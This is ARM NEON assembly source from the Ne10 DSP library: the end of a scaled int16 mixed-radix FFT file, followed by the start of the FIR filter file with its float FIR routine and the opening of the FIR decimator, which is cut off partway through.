/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_scaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #3 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #2 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #2 /* get the address of F[fstride*3] */
/* prime the pipeline: the macro consumes these and reloads the next set */
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_scaled_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "TRUE", "FALSE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_scaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* 5th argument (temp buffer): above 40+64 pushed bytes */
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #2 /* byte stride between butterfly inputs */
lsr fstride, fstride, #2
/* if the last stage */
cmp stage_count, #0
beq .L_ne10_butterfly_scaled_last_stages
bne .L_ne10_butterfly_scaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_scaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #2 /* byte stride between the 8 loads */
.L_ne10_radix8_butterfly_scaled_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "TRUE", "FALSE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_scaled_first_stage_fstride1
lsl nstep, fstride, #3
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* 5th argument (temp buffer) */
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_scaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_scaled_other_stages:
lsl mstep, mstride, #2
mov p_in1, p_fin
/* prime the pipeline for BUTTERFLY4X4_WITH_TWIDDLES */
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_scaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #4 /* p_out1 = Fout + (f index)*mstride*4 cpx */
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_scaled_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_scaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_scaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #3
add p_twiddles, p_twiddles, mstride, lsl #2 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_scaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_scaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* write final results to the caller's Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_scaled_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_scaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_scaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_int16_scaled_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
/*
 * ne10_mixed_radix_fft_backward_int16_scaled_neon
 * Backward (inverse) mixed radix-4/8 int16 FFT, scaled: every stage
 * divides its output (halving adds / >>3 pre-shift) to keep values
 * inside s16 range.  Control flow is identical to the other three
 * variants; both macro flags are "TRUE" here.
 * In: r0 = Fout, r1 = Fin, r2 = factors, r3 = twiddles; [sp,#104]
 * (above the 40+64 pushed bytes) = temporary ping-pong buffer.
 * NOTE(review): argument roles inferred from the register aliases --
 * confirm against the C prototype.
 */
.align 4
.global ne10_mixed_radix_fft_backward_int16_scaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_int16_scaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_scaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #3 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #2 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #2 /* get the address of F[fstride*3] */
/* prime the pipeline: the macro consumes these and reloads the next set */
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_scaled_first_stage_fstride:
BUTTERFLY4X4_WITHOUT_TWIDDLES "TRUE", "TRUE"
subs count, count, #4
bgt .L_ne10_radix4_butterfly_inverse_scaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* 5th argument (temp buffer): above 40+64 pushed bytes */
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #2 /* byte stride between butterfly inputs */
lsr fstride, fstride, #2
/* if the last stage */
cmp stage_count, #0
beq .L_ne10_butterfly_inverse_scaled_last_stages
bne .L_ne10_butterfly_inverse_scaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_scaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #2 /* byte stride between the 8 loads */
.L_ne10_radix8_butterfly_inverse_scaled_first_stage_fstride1:
BUTTERFLY8X4_WITHOUT_TWIDDLES "TRUE", "TRUE"
subs fstride1, fstride1, #4
bgt .L_ne10_radix8_butterfly_inverse_scaled_first_stage_fstride1
lsl nstep, fstride, #3
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104] /* 5th argument (temp buffer) */
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_scaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_scaled_other_stages:
lsl mstep, mstride, #2
mov p_in1, p_fin
/* prime the pipeline for BUTTERFLY4X4_WITH_TWIDDLES */
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_scaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #4 /* p_out1 = Fout + (f index)*mstride*4 cpx */
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_scaled_other_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_scaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_scaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #3
add p_twiddles, p_twiddles, mstride, lsl #2 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_scaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_scaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* write final results to the caller's Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.16 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.16 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.16 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.16 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.16 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.16 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.16 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_scaled_last_stages_mstride:
BUTTERFLY4X4_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #4
bgt .L_ne10_butterfly_inverse_scaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_scaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_int16_scaled_neon */
/* end of the file */
.end
|
open-vela/external_Ne10 | 73,142 | modules/dsp/NE10_fir.neon.s | @
@ Copyright 2012-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@/*
@ * NE10 Library : dsp/NE10_fir.neon.s
@ */
@/*
@ * Note:
@ * 1. Currently, this targets the soft VFP EABI, not the hard VFPv3 ABI.
@ * 2. The assembly code uses registers D0-D31, so VFPv3-D32 is required; it will fail on VFPv3-D16 targets.
@ */
#ifdef ENABLE_NE10_FIR_FLOAT_NEON
.text
.syntax unified
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numTaps and blockSize.
@ *
@ * The order of the coefficients in *coeffs should be
@ * bN, bN-1, bN-2, .....b1, b0
@ *
@ * <b>Cycle Count:</b>
@ *
@ * <code>45 + 8 * numTaps + 12.25 * blockSize + 4.375 * numTaps * blockSize</code>
@ *
@ * When the block size is greater than 32 and the number of taps is greater
@ * than 4, you get the greatest improvement.
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[in] blockSize block size of filter
@ */
@/*---------------------------------------------------------------------------
@ * ne10_fir_float_neon -- single-precision FIR filter, NEON, Thumb-2.
@ * AAPCS args: R0 = S (filter instance), R1 = pSrc, R2 = pDst,
@ *             R3 = blockSize.
@ * Instance layout as read below: halfword numTaps (in a 4-byte slot),
@ * float *state, float *coeffs -- TODO confirm against the C struct.
@ * Computes blockSize outputs four at a time; ne10_qMaskTable32 entries
@ * (16 bytes each) mask the tail lanes when numTaps or blockSize is not a
@ * multiple of 4.  Afterwards the state buffer is shifted down by
@ * blockSize samples, ready for the next call.
@ * Q4 (d8-d9) is callee-saved under the AAPCS VFP rules, hence VPUSH/VPOP.
@ *-------------------------------------------------------------------------*/
.align 4
.global ne10_fir_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_fir_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
VPUSH {q4} @ q4 (d8-d9) is callee-saved
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pCoeffs .req R5 @/* Coefficient pointer */
pStateCurnt .req R6 @/* Points to the current sample of the state */
pX .req R7 @/* Temporary pointers for state buffer */
pB .req R8 @/* Temporary pointers for coefficient buffer */
numTaps .req R9 @/* Length of the filter */
tapCnt .req R10 @ /* Loop counter */
Count .req R11 @ /* Loop counter */
pTemp .req R11
pMask .req R14 @ /* Mask Table */
mask .req R12
@/*NEON variable declarations*/
qInp .qn Q0.F32
dInp_0 .dn D0.F32
dInp_1 .dn D1.F32
qCoeff .qn Q1.F32
dCoeff_0 .dn D2.F32
dCoeff_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qTemp1 .qn Q10.F32
dTemp1_0 .dn D20.F32
dTemp1_1 .dn D21.F32
qTemp2 .qn Q11.F32
qTemp3 .qn Q12.F32
qMask1 .qn Q4.U32
dMask1_0 .dn D8.U32
dMask1_1 .dn D9.U32
qMaskTmp .qn Q14.U32
dMaskTmp_0 .dn D28.U32
dMaskTmp_1 .dn D29.U32
qAcc1 .qn Q3.F32
qAcc2 .qn Q13.F32
qAcc3 .qn Q15.F32
@/* Unpack the instance struct; the pointer is post-incremented past each field */
LDRH numTaps,[pStateStruct],#4
LDR pState,[pStateStruct],#4
LDR pCoeffs,[pStateStruct],#4
@/* S->state buffer contains previous frame (numTaps - 1) samples */
@/* pStateCurnt points to the location where the new input data should be written */
@/*pStateCurnt = &(S->state[(numTaps - 1u)])@*/
SUB mask,numTaps,#1
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pTemp,.L_PIC0_GOT_OFFSET
LDR pMask,.L_GOT_ne10_qMaskTable32
.L_PIC0:
ADD pTemp,pTemp,pc
LDR pMask,[pTemp,pMask]
#else
LDR pMask,=ne10_qMaskTable32
#endif
AND tapCnt,numTaps,#3 @ tapCnt = numTaps % 4 (tail taps)
ADD pStateCurnt,pState,mask,LSL #2
AND mask,blockSize,#3 @ mask = blockSize % 4 (tail outputs)
@/* Apply loop unrolling and compute 4 output values simultaneously.
@* The variables acc0 ... acc3 hold output values that are being computed:
@*
@* acc0 = b[numTaps-1] * x[n-numTaps-1] + b[numTaps-2] * x[n-numTaps-2] + b[numTaps-3] * x[n-numTaps-3] +...+ b[0] * x[0]
@* acc1 = b[numTaps-1] * x[n-numTaps] + b[numTaps-2] * x[n-numTaps-1] + b[numTaps-3] * x[n-numTaps-2] +...+ b[0] * x[1]
@* acc2 = b[numTaps-1] * x[n-numTaps+1] + b[numTaps-2] * x[n-numTaps] + b[numTaps-3] * x[n-numTaps-1] +...+ b[0] * x[2]
@* acc3 = b[numTaps-1] * x[n-numTaps+2] + b[numTaps-2] * x[n-numTaps+1] + b[numTaps-3] * x[n-numTaps] +...+ b[0] * x[3]
@*/
@/*If numTaps,blockSize are not multiples of 4, Get the appropriate Masks*/
ADD pTemp,pMask,tapCnt,LSL #4 @ mask-table entries are 16 bytes (4 x u32)
VEOR qZero,qZero
ADD pX,pMask,mask,LSL #4
VLD1 {dMaskTmp_0,dMaskTmp_1},[pTemp] @ lane mask for the tap tail
VLD1 {dMask1_0,dMask1_1},[pX] @ lane mask for the blockSize tail
@/* Copy blockCnt number of new input samples into the state buffer */
SUBS blockSize,#4
BLT firEndOuterLoop
@/* Compute 4 outputs at a time*/
firOuterLoop:
VLD1 {dTemp_0,dTemp_1},[pSrc]!
MOV pX,pState
MOV pB,pCoeffs
@/* Read the first four samples from the state buffer:
@* x[n-numTaps], x[n-numTaps-1], x[n-numTaps-2],x[n-numTaps-3] */
VST1 {dTemp_0,dTemp_1},[pStateCurnt]! @ append the 4 new inputs to the state
@/* Zero the Accumulators*/
VEOR qAcc0,qAcc0
VLD1 {dInp_0,dInp_1},[pX]!
@//* Read the first four coefficients b[numTaps] to b[numTaps-3] */
VLD1 {dCoeff_0,dCoeff_1},[pB]!
@/* Loop unrolling. Process 4 taps at a time. */
SUBS tapCnt,numTaps,#4
VLD1 {dTemp_0,dTemp_1},[pX]! @ prefetch next 4 state samples
BLT firEndInnerLoop
firInnerLoop:
VEXT qTemp1,qInp,qTemp,#1 @ input window shifted by 1 sample
@/* acc0 += b[numTaps] * x[n-numTaps-1]+ b[numTaps] * x[n-numTaps-2] +
@* b[numTaps] * x[n-numTaps-3] + b[numTaps] * x[n-numTaps-4]*/
VMLA qAcc0,qInp,dCoeff_0[0]
@/* acc1 += b[numTaps-1] * x[n-numTaps-2]+ b[numTaps-1] * x[n-numTaps-3] +
@b[numTaps-1] * x[n-numTaps-4] +*b[numTaps-1] * x[n-numTaps-5]*/
VMUL qAcc1,qTemp1,dCoeff_0[1]
VEXT qTemp2,qInp,qTemp,#2 @ input window shifted by 2 samples
@/* acc2 += b[numTaps-2] * x[n-numTaps-3]+ b[numTaps-2] * x[n-numTaps-4] +
@b[numTaps-2] * x[n-numTaps-5] + *b[numTaps-2] * x[n-numTaps-6]*/
VMUL qAcc2,qTemp2,dCoeff_1[0]
VADD qAcc0, qAcc0, qAcc1
VEXT qTemp3,qInp,qTemp,#3 @ input window shifted by 3 samples
@/* acc3 += b[numTaps-3] * x[n-numTaps-4]+ b[numTaps-3] * x[n-numTaps-5] +
@b[numTaps-3] * x[n-numTaps-6] +*b[numTaps-3] * x[n-numTaps-7] */
VMUL qAcc3,qTemp3,dCoeff_1[1]
VADD qAcc0, qAcc0, qAcc2
VMOV qInp,qTemp @ slide the window: prefetched becomes current
VLD1 {dTemp_0,dTemp_1},[pX]!
VADD qAcc0, qAcc0, qAcc3
SUBS tapCnt,#4
@/* Read the b[numTaps-4] to b[numTaps-7] coefficients */
VLD1 {dCoeff_0,dCoeff_1},[pB]!
BGE firInnerLoop
firEndInnerLoop:
ADDS tapCnt, tapCnt, #4 @ restore tail tap count (0..3)
BEQ firStoreOutput
@/* If the filter length is not a multiple of 4, compute the remaining filter taps */
@/*Select only the remaining filter Taps*/
VMOV qMask,qMaskTmp
VBSL qMask,qCoeff,qZero @ zero coeff lanes beyond the tail (result in q3 = dOut)
VEXT qTemp1,qInp,qTemp,#1
VMLA qAcc0,qInp,dOut_0[0]
VEXT qTemp2,qInp,qTemp,#2
VMLA qAcc0,qTemp1,dOut_0[1]
VMLA qAcc0,qTemp2,dOut_1[0]
firStoreOutput:
@/* Advance the state pointer by 4 to process the next group of 4 samples */
ADD pState,#16
@/* The results in the 4 accumulators are in 2.30 format. Convert to 1.31
@ * Then store the 4 outputs in the destination buffer. */
SUBS blockSize,#4
VST1 {dAcc0_0,dAcc0_1},[pDst]!
BGE firOuterLoop
firEndOuterLoop:
@/*Handle BlockSize Not a Multiple of 4*/
ADDS blockSize,#4
BEQ firCopyData
@/*Copy the Remaining BlockSize Number of Input Sample to state Buffer*/
VMOV qMask,qMask1
VLD1 {dTemp1_0,dTemp1_1},[pStateCurnt]
VLD1 {dTemp_0,dTemp_1},[pSrc]
ADD pSrc,pSrc,blockSize,LSL #2
MOV pX,pState
MOV pB,pCoeffs
VBSL qMask,qTemp,qTemp1 @ merge new inputs with existing state (masked)
VST1 {dMask_0,dMask_1},[pStateCurnt]
VLD1 {dInp_0,dInp_1},[pX]!
ADD pStateCurnt,pStateCurnt,blockSize, LSL #2
@/* Zero the Accumulators*/
VEOR qAcc0,qAcc0
VLD1 {dCoeff_0,dCoeff_1},[pB]!
SUBS tapCnt,numTaps,#4
VLD1 {dTemp_0,dTemp_1},[pX]!
BLT firEndInnerLoop1
firInnerLoop1:
VEXT qTemp1,qInp,qTemp,#1
VMLA qAcc0,qInp,dCoeff_0[0]
VEXT qTemp2,qInp,qTemp,#2
VMLA qAcc0,qTemp1,dCoeff_0[1]
VEXT qTemp3,qInp,qTemp,#3
VMLA qAcc0,qTemp2,dCoeff_1[0]
VMOV qInp,qTemp
VMLA qAcc0,qTemp3,dCoeff_1[1]
VLD1 {dCoeff_0,dCoeff_1},[pB]!
SUBS tapCnt,#4
VLD1 {dTemp_0,dTemp_1},[pX]!
BGE firInnerLoop1
firEndInnerLoop1:
VMOV qMask,qMaskTmp
VBSL qMask,qCoeff,qZero @ mask off coefficients beyond the tap tail
VEXT qTemp1,qInp,qTemp,#1
VMLA qAcc0,qInp,dOut_0[0]
VEXT qTemp2,qInp,qTemp,#2
VMLA qAcc0,qTemp1,dOut_0[1]
VMLA qAcc0,qTemp2,dOut_1[0]
VMOV qMask,qMask1
VLD1 {dTemp_0,dTemp_1},[pDst]
@/* If the blockSize is not a multiple of 4, Mask the unwanted Output */
VBSL qMask,qAcc0,qTemp @ keep only blockSize%4 valid output lanes
VST1 {dMask_0,dMask_1},[pDst]
ADD pDst,pDst,blockSize,LSL #2
ADD pState,pState,blockSize,LSL #2
firCopyData:
@/* Processing is complete. Now shift the data in the state buffer down by
@** blockSize samples. This prepares the state buffer for the next function
@** call. */
@/* Points to the start of the state buffer */
SUB numTaps,numTaps,#1
AND mask,numTaps,#3
LDR pStateCurnt,[pStateStruct,#-8] @ re-read S->state (struct base was advanced by 12)
ADD pTemp,pMask,mask,LSL #4
VLD1 {dInp_0,dInp_1},[pState]!
VLD1 {dMask_0,dMask_1},[pTemp]
@/* copy data */
SUBS Count,numTaps,#4
BLT firEnd
firCopyLoop:
VST1 {dInp_0,dInp_1},[pStateCurnt]!
SUBS Count,#4
VLD1 {dInp_0,dInp_1},[pState]!
BGE firCopyLoop
firEnd:
@/* Masked store of the final (numTaps-1)%4 state samples */
VLD1 {dTemp_0,dTemp_1},[pStateCurnt]
VBSL qMask,qInp,qTemp
VST1 {dOut_0,dOut_1},[pStateCurnt]
ADD pStateCurnt,pStateCurnt,mask, LSL #2
@/*Return From Function*/
VPOP {q4}
POP {r4-r12,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pCoeffs
.unreq pStateCurnt
.unreq pX
.unreq pB
.unreq numTaps
.unreq tapCnt
.unreq Count
.unreq pTemp
.unreq pMask
.unreq mask
@/*NEON variable declarations*/
.unreq qInp
.unreq dInp_0
.unreq dInp_1
.unreq qCoeff
.unreq dCoeff_0
.unreq dCoeff_1
.unreq qZero
.unreq qMask
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qTemp1
.unreq dTemp1_0
.unreq dTemp1_1
.unreq qTemp2
.unreq qTemp3
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
.unreq qAcc1
.unreq qAcc2
.unreq qAcc3
#endif
@/* ENABLE_NE10_FIR_FLOAT_NEON */
@/**
@ * @details
@ * This function operates on floating-point data types.
@ * There are no restrictions on numTaps and blockSize.
@ *
@ * The order of the coefficients in *coeffs should be
@ * bN, bN-1, bN-2, .....b1, b0
@ *
@ * <b>Cycle Count:</b>
@ *
@ * <code> Co + C1 * numTaps + C3 * blockSize * decimation Factor + c4 * numTaps * blockSize</code>
@ *
@ * When the block size is greater than 32 and the number of taps is greater
@ * than 4, you get the greatest improvement.
@ *
@ * @param[in] *S points to struct parameter
@ * @param[in] *pSrc points to the input buffer
@ * @param[out] *pDst points to the output buffer
@ * @param[in] blockSize block size of filter
@ */
#ifdef ENABLE_NE10_FIR_DECIMATE_FLOAT_NEON
@/*---------------------------------------------------------------------------
@ * ne10_fir_decimate_float_neon -- FIR decimator (factor M), float, NEON.
@ * AAPCS args: R0 = S (instance), R1 = pSrc, R2 = pDst, R3 = blockSize.
@ * Instance layout as read below: byte M (decimation factor, 2-byte slot),
@ * halfword numTaps, float *coeffs, float *state -- TODO confirm against
@ * the C struct.
@ * outBlockSize = blockSize / M is computed with a reciprocal from
@ * ne10_divLookUpTable and SMULWB (no hardware divide assumed).
@ * Produces 4 decimated outputs per outer iteration; ne10_qMaskTable32
@ * masks the numTaps%4 and outBlockSize%4 tails.  d8-d9 (q4) are
@ * callee-saved and preserved with VPUSH/VPOP.
@ *-------------------------------------------------------------------------*/
.align 4
.global ne10_fir_decimate_float_neon
.extern ne10_qMaskTable32
.extern ne10_divLookUpTable
.thumb
.thumb_func
ne10_fir_decimate_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
VPUSH {d8-d9} @ d8-d9 (q4) are callee-saved
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pCoeffs .req R5 @/* Coefficient pointer */
decimationFact .req R6
outBlockSize .req R7
pX .req R6 @/* Temporary pointers for state buffer */
pB .req R8 @/* Temporary pointers for coefficient buffer */
numTaps .req R9 @/* Length of the filter */
tapCnt .req R10 @ /* Loop counter */
Count .req R11 @ /* Loop counter */
pTemp .req R11
blkCnt .req R11
pMask .req R14 @ /* Mask Table */
mask .req R12
Offset .req R12
@/*NEON variable declarations*/
qInp0 .qn Q0.F32
dInp0_0 .dn D0.F32
dInp0_1 .dn D1.F32
qCoeff .qn Q1.F32
dCoeff_0 .dn D2.F32
dCoeff_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
qMaskF32 .qn Q3.F32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qInp3 .qn Q4.F32
dInp3_0 .dn D8.F32
dInp3_1 .dn D9.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qInp1 .qn Q9.F32
dInp1_0 .dn D18.F32
dInp1_1 .dn D19.F32
qAcc1 .qn Q10.F32
